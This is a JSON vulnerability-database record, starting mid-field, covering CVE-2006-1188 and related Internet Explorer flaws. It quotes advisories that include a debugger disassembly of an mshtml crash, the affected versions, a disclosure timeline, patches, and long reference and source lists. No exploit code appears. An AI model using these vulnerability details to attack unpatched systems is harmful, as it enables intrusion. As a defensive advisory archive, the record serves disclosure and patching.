jne mshtml!DllGetClassObject+0x10fa2\n\u003e (7d5aede0)\n\u003e 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]\n\u003e 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]\n\u003e 7d529d26 5e pop esi\n\u003e 7d529d27 5d pop ebp\n\u003e 7d529d28 c20c00 ret 0xc\n\u003e 7d529d2b 90 nop\n\u003e 7d529d2c 90 nop\n\u003e 7d529d2d 90 nop\n\u003e 7d529d2e 90 nop\n\u003e 7d529d2f 90 nop\n\u003e 7d529d30 8bff mov edi,edi\n\u003e 7d529d32 55 push ebp\n\u003e 7d529d33 8bec mov ebp,esp\n\u003e FAULT -\u003e7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]\n\u003e ds:0023:00000014=??\n\u003e 7d529d39 c1e004 shl eax,0x4\n\u003e 7d529d3c 0578aa4b7d add eax,0x7d4baa78\n\u003e 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)\n\u003e 7d529d43 8b400c mov eax,[eax+0xc]\n\u003e 7d529d46 234508 and eax,[ebp+0x8]\n\u003e 7d529d49 f7d8 neg eax\n\u003e 7d529d4b 1bc0 sbb eax,eax\n\u003e 7d529d4d f7d8 neg eax\n\u003e 7d529d4f 5d pop ebp\n\u003e 7d529d50 c20400 ret 0x4\n\u003e 7d529d53 33c0 xor eax,eax\n\u003e 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)\n\no Vulnerable versions:\n=====================\n\nThe DoS vulnerability was successfully tested on:\n\u003e MS IE 6 SP2 - Win XP Pro SP2\n\u003e MS IE 6 - Win 2k SP4\n\no Disclosure Timeline:\n=====================\n\nxx Feb 06 - Vulnerabilities discovered. \n08 Mar 06 - Vendor contacted. \n22 Mar 06 - Vendor confirmed vulnerabilities. \n25 May 06 - Public release. \n\no Solution:\n==========\n\nInstall the latest security update (MS06-013) for Internet Explorer [2]. \n\no Credits:\n=========\n\nThomas Waldegger \u003cbugtraq@morph3us.org\u003e\nBuHa-Security Community - http://buha.info/board/\n\nIf you have questions, suggestions or criticism about the advisory feel\nfree to send me a mail. The address \u0027bugtraq@morph3us.org\u0027 is more a\nspam address than a regular mail address therefore it\u0027s possible that\nsome mails get ignored. Please use the contact details at\nhttp://morph3us.org/ to contact me. 
\n\nGreets fly out to cyrus-tc, destructor, nait, rhy, trappy and all\nmembers of BuHa. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nMicrosoft Design Tools msdds.dll Code Execution Vulnerability\n\nSECUNIA ADVISORY ID:\nSA16480\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16480/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Visual Studio .NET 2003\nhttp://secunia.com/product/1086/\nMicrosoft Office 2003 Student and Teacher Edition\nhttp://secunia.com/product/2278/\nMicrosoft Office 2003 Standard Edition\nhttp://secunia.com/product/2275/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Office 2003 Professional Edition\nhttp://secunia.com/product/2276/\nMicrosoft Office 2003 Small Business Edition\nhttp://secunia.com/product/2277/\n\nDESCRIPTION:\nA vulnerability has been reported in Microsoft Visual Studio .NET,\nwhich potentially can be exploited by malicious people to compromise\na vulnerable system. \n\nThe COM object is known to be installed as part of the following\nproducts:\n* Microsoft Visual Studio .NET 2003\n* Microsoft Office Professional 2003\n\nOther products may also include the affected COM object. \n\nNOTE: An exploit has been published. However, there are currently\nconflicting reports about the exploitability of this issue. Some\nreports confirm that code execution is possible, while other reports\nindicate that the problem can\u0027t be reproduced. 
Secunia has currently\nnot been able to reproduce the vulnerability in version 7.10.3077.0\nof the COM object. \n\nThis advisory will be updated when more information is available. \n\nSOLUTION:\nRestrict use of ActiveX controls to trusted web sites only. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by anonymous person. \n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
}
],
"trust": 9.45
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17296",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17296"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#824324",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-1188",
"trust": 3.0
},
{
"db": "USCERT",
"id": "TA06-101A",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#959049",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1015900",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#740372",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#939605",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#680526",
"trust": 1.6
},
{
"db": "BID",
"id": "17468",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#234812",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#876678",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#984473",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#641460",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#341028",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#434641",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "16480",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "19583",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "18680",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16373",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19269",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19606",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19378",
"trust": 0.8
},
{
"db": "BID",
"id": "17181",
"trust": 0.8
},
{
"db": "BID",
"id": "14594",
"trust": 0.8
},
{
"db": "XF",
"id": "21895",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014727",
"trust": 0.8
},
{
"db": "XF",
"id": "21193",
"trust": 0.8
},
{
"db": "BID",
"id": "14087",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "15891",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "17680",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014329",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA06-101A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17296",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#503124",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45345",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "46765",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "39471",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"id": "VAR-200604-0201",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17296"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T22:05:29.066000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/824324"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/435096/30/4710/threaded"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1144"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1290"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1296"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1773"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015900"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/959049"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/16480/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19583/"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/917077.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18680/"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/com/default.mspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/159621"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/216434"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/391803"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/939605"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/740372"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16373/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19269/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/918165"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19606/"
},
{
"trust": 0.8,
"url": "http://jeffrey.vanderstad.net/grasshopper/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19378/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17181 "
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/680526"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14594"
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21895"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
},
{
"trust": 0.8,
"url": "http://www.sec-consult.com/184.html"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/15891/ "
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14087"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21193"
},
{
"trust": 0.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta06-101a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta06-101a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1188"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17468"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.3,
"url": "/archive/1/435096"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/641460\u003e"
},
{
"trust": 0.1,
"url": "https://update.microsoft.com/microsoftupdate\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/984473\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/341028\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/234812\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/434641\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/824324\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/503124\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/876678\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/959049\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html"
},
{
"trust": 0.1,
"url": "http://en.wikipedia.org/wiki/internet_explorer"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
},
{
"trust": 0.1,
"url": "http://morph3us.org/advisories/20060525-msie6-sp2-2.txt"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "http://buha.info/board/"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/windows/ie/"
},
{
"trust": 0.1,
"url": "http://morph3us.org/"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
},
{
"trust": 0.1,
"url": "http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2276/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2277/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2278/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2275/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1086/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#824324"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17296"
},
{
"db": "BID",
"id": "17468"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "46765"
},
{
"db": "PACKETSTORM",
"id": "39471"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-03-23T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2005-08-19T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#824324"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-08-18T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17296"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17468"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"date": "2006-04-12T04:12:55",
"db": "PACKETSTORM",
"id": "45345"
},
{
"date": "2006-05-29T07:36:29",
"db": "PACKETSTORM",
"id": "46765"
},
{
"date": "2005-08-19T04:15:49",
"db": "PACKETSTORM",
"id": "39471"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2007-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#824324"
},
{
"date": "2006-05-15T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-12T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-10-13T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-17296"
},
{
"date": "2006-05-26T19:48:00",
"db": "BID",
"id": "17468"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000174"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-164"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2006-1188"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RDS.Dataspace ActiveX control bypasses ActiveX security model",
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-164"
}
],
"trust": 0.6
}
}
VAR-200604-0209
Vulnerability from variot - Updated: 2024-07-23 19:40
Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. This can cause a variety of impacts, such as causing IE to crash. Microsoft Internet Explorer (IE) fails to properly handle HTA files. This vulnerability occurs when the browser parses invalid HTML. Attackers can exploit this vulnerability through a malicious web page or HTML email.
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006 Last revised: -- Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.
I. Description
Microsoft Security Bulletin Summary for April 2006 addresses vulnerabilities in Microsoft Windows and Internet Explorer. (CVE-2006-0012)
II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.
Appendix A. References
* Microsoft Security Bulletin Summary for April 2006 -
<http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx>
